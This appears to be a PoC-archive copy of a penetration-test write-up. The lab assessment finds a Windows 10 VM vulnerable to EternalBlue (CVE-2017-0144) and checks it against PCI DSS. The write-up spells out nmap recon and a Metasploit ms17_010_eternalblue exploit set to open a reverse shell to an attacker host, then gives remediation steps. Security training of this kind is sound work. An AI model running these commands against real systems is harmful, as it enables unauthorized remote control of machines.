关联漏洞
标题:
Microsoft Windows SMB 输入验证错误漏洞
(CVE-2017-0144)
描述:Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block(SMB)Server是其中的一个为计算机提供身份验证用以访问服务器上打印机和文件系统的组件。 Microsoft Windows中的SMBv1服务器存在远程代码执行漏洞。远程攻击者可借助特制的数据包利用该
描述
This report outlines a structured VAPT engagement focusing on PCI DSS compliance, SMB service enumeration, and exploitation of CVE-2017-0144 (EternalBlue) on a Windows 10 machine within a finance-oriented infrastructure.
介绍
# **VAPT Report on SMB Exploitation in Windows 10 Finance Endpoint**
### This report outlines a structured VAPT engagement focusing on PCI DSS compliance, SMB service enumeration, and exploitation of CVE-2017-0144 (EternalBlue) on a Windows 10 machine within a finance-oriented infrastructure.
---
## **🔐 Introduction**
Financial institutions face some of the most stringent compliance requirements in the cybersecurity space. With sensitive customer data and cardholder information on the line, security misconfigurations can lead to catastrophic breaches. This VAPT simulation was carried out to evaluate the security posture of a Windows 10-based endpoint system from the perspective of PCI DSS compliance, while also identifying and exploiting known vulnerabilities in exposed SMB services.
The simulation covers multiple stages—from reconnaissance and vulnerability scanning using Nessus to real-world exploitation via Metasploit. The report further emphasizes the importance of endpoint hardening, patch management, firewall enforcement, and PCI DSS alignment in maintaining the integrity of financial networks.
<img width="826" height="821" alt="Aditya Bhatt" src="https://github.com/user-attachments/assets/ca8eff69-22a6-4183-ac39-a9ab9cdd13d4" /> <br/>
---
# Vulnerability Assessment and Penetration Testing (VAPT) Report
## Target: Windows 10 Host – Finance Sector Endpoint
**Prepared by:** Aditya Bhatt <br/>
**Designation:** VAPT Analyst | Cybersecurity Professional <br/>
**Contact:** [info.adityabhatt3010@gmail.com](mailto:info.adityabhatt3010@gmail.com) | +91-9818993884 <br/>
---
## Executive Summary
This report presents the results of a penetration test conducted on a Windows 10 endpoint suspected to handle financial data and credit card transactions. The objective was to validate PCI DSS control implementations and identify potential attack vectors that could compromise cardholder data.
Using Nessus, the host was discovered to be vulnerable to **CVE-2017-0144 (EternalBlue)**—a critical SMB vulnerability. The Metasploit framework was then used to exploit this flaw and gain unauthorized remote shell access. This report highlights the importance of timely patch management and network service hardening to avoid data breaches in financial systems.
---
## Objectives
* Assess PCI DSS requirement compliance on a target endpoint.
* Enumerate and identify vulnerabilities on a Windows 10 system.
* Exploit discovered vulnerabilities using standard tools and techniques.
* Recommend remediation actions to improve system security and compliance.
---
## Methodology
### Task 1: PCI DSS Compliance Evaluation
Six primary objectives and twelve requirements of PCI DSS were reviewed. Key principles include:
* Implementing firewalls and changing vendor defaults
* Encrypting cardholder data during storage and transmission
* Using anti-virus, secure configurations, and patch management
* Enforcing access control and authentication mechanisms
* Monitoring, logging, and conducting regular vulnerability scans
* Creating and enforcing an organization-wide security policy
---
### Task 2: Vulnerability Discovery
**Target System:**
* Windows 10 VM
* IP Address: `10.10.195.105`
* Subnet: `255.0.0.0`
**Tools Used:**
* **Nmap** for port and service discovery
* **Nessus** for vulnerability scanning
* **Metasploit** for exploitation
**Key Commands:**
```bash
nmap -sn 10.10.195.105
```
 <br/>
```bash
nmap -sV -p445 10.10.195.105
```
 <br/>
```bash
nmap -F 10.10.195.105
```
 <br/>
* Port 445 (SMB) found open
* Nessus identified vulnerability: **CVE-2017-0144 (EternalBlue)**
 <br/>
 <br/>
 <br/>
---
### Task 3: Exploitation
**Scanner:**
**Attempting Nessus Scan:**
 <br/>
 <br/>
 <br/>
 <br/>
 <br/>
 <br/>
 <br/>
 <br/>
 <br/>
**Attempting Metasploit Scan:**
```bash
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run
```
 <br/>
 <br/>
**Exploit Module:**
```bash
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit
```
 <br/>
 <br/>
 <br/>
* Result: Remote shell successfully opened on target Windows 10 machine
* Unauthorized access to sensitive system confirmed
---
## Key Findings
* SMBv1 active and exposed to network
* EternalBlue (MS17-010) unpatched and exploitable
* Nessus scan revealed multiple high-severity vulnerabilities
* No firewall or network segmentation preventing lateral movement
* Default network services unnecessarily open
---
## Risk Analysis
| Risk Description | Impact | Likelihood | Risk Score |
| ---------------------------------- | ------ | ---------- | ---------- |
| EternalBlue Exploitation (SMBv1) | High | High | Critical |
| Lack of Patch Management | High | Medium | High |
| Absence of Network Access Controls | Medium | High | High |
| Non-Compliance with PCI DSS | High | High | Critical |
---
## Recommendations
1. **Patch Management**
* Immediately apply Microsoft’s security update for **CVE-2017-0144**
* Implement continuous vulnerability scanning and patch cycles
2. **Network Hardening**
* Disable SMBv1 protocol completely
* Limit SMB service access to internal, trusted networks only
3. **Firewall Enforcement**
* Block port 445 on public interfaces
* Use IPS/IDS to detect SMB-based attacks in real-time
4. **Continuous Monitoring**
* Deploy SIEM tools to detect anomalies and correlate events
* Schedule frequent Nessus scans to assess new risks
5. **PCI DSS Compliance**
* Enforce multi-factor authentication and least privilege access
* Encrypt all cardholder data in transit and at rest
* Conduct regular audits to ensure full control coverage
6. **Awareness Training**
* Conduct periodic training sessions for IT teams and stakeholders
* Include secure handling of financial data and vulnerability response procedures
---
## Conclusion
This engagement clearly demonstrated that unpatched and outdated services like SMBv1 can lead to complete system compromise using publicly known exploits. The EternalBlue vulnerability exploited here is a classic example of why timely patching, service minimization, and proactive scanning are non-negotiable in financial infrastructure.
Without compliance to frameworks like PCI DSS, organizations risk both legal penalties and devastating data breaches.
---
## **🛡️ Final Thoughts**
Security gaps often hide behind legacy protocols and forgotten patches. This engagement reaffirmed the criticality of treating every service—especially those like SMB—not as a convenience, but as a risk surface.
**Strong cybersecurity in the finance sector begins with continuous vigilance, enforced policies, and uncompromising patch management.**
Thank you for reading this report. I hope it offered clarity, practical insight, and reinforcement of why continuous security validation is essential—especially when handling financial data.
**– Aditya Bhatt** <br/>
*VAPT Analyst | Cybersecurity Professional*
---
文件快照
[4.0K] /data/pocs/8c3e5d43e7b63663f310838061c41b14eaee0473
├── [1.0K] LICENSE
└── [8.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。